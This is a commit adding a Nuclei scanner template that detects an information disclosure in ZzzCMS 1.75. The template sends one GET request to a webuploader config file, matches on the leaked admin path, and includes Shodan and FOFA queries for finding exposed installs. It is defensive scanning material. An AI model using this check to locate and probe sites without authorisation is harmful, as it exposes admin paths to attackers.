Merge pull request #7875 from projectdiscovery/zzzcms-info-disclosure

Create zzzcms-info-disclosure.yaml
patch-1
Dhiyaneshwaran 2023-08-07 23:51:38 +05:30 committed by GitHub
commit 503076c09c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 40 additions and 0 deletions

View File

@ -0,0 +1,40 @@
id: zzzcms-info-disclosure
info:
name: Zzzcms 1.75 - Information Disclosure
author: ritikchaddha
severity: low
description: |
There is a rather strange file that directly echoes some content belonging to the inaccessible zzz_config.php. The information leakage file is located in plugins\webuploader\js\webconfig.php, and the management path name of the management background can be obtained directly. No need to blast admin and add 3 digits anymore
reference:
- https://xz.aliyun.com/t/7414
metadata:
max-request: 1
verified: true
shodan-query: html:"ZzzCMS"
fofa-query: title="ZzzCMS"
tags: zzzcms,info,disclosure
http:
- raw:
- |
GET /plugins/webuploader/js/webconfig.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'var adminpath'
- 'var imageMaxSize='
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200